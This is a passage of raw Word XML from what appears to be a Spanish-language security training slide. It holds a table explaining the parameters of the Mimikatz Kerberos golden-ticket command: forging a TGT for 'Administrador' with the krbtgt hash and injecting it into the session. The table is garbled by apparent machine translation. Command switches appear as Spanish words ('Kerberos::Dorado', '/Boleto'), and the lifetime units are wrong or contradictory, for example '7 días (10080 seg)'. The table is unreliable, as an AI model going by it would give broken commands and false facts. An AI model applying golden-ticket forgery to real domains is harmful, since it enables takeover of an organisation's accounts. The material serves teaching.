          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId286"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="820" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="160"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2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388"/>
        <w:gridCol w:w="7388"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="0B2DCB1E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="586"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="59B1E146" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="55"/>
              <w:ind w:right="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Mandar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="181C27C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="55"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Explicación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="79E359F7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="786"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="76D5F39E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="50"/>
              <w:ind w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Kerberos::Dorado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="08EFFDAC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="35"/>
              <w:ind w:right="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Nombre del módulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="69F081D0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="806"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="21FF588F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Usuario:Administrador</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="5BF53B4B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Nombre de usuario para el que se genera el TGT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="20C52E79" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="781"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="4AB0F309" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>dominio:ciberguerra.corp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="01687E62" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Dominio actual Nombre de dominio completo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="3CCA73C7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="806"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="4794ACA1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>sid:xxx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="2DAF6535" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Valor SID del dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="30C5A190" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="818"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="3DC864BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>krbtgt:aaaaa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="4BCDC9DB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Hash de la </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>cuenta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>usuario</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Krbtgt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="5AE55571" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="718"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="28D3E456" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Ptt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="63EB749B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Inyecta el ticket en la sesión actual (memoria)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="496583A0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="2B0BC8E9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/Boleto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="7E276BF5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Guarde el ticket </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>en</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>formato</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>kirbi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="288A4A3E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="56776113" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/Desplazamiento inicial:0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="3CD3E879" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Establecer la hora del ticket en la última (actual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="329EE006" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="5C4EEFA8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/endin:600</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="5B4CF6A4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>600 segundos (10 minutos) de forma predeterminada 10 años</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="1A5DF474" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="140515FB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>/renovarmax:10080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="222902D2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>7 días (10080 seg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2177C887" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="920" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
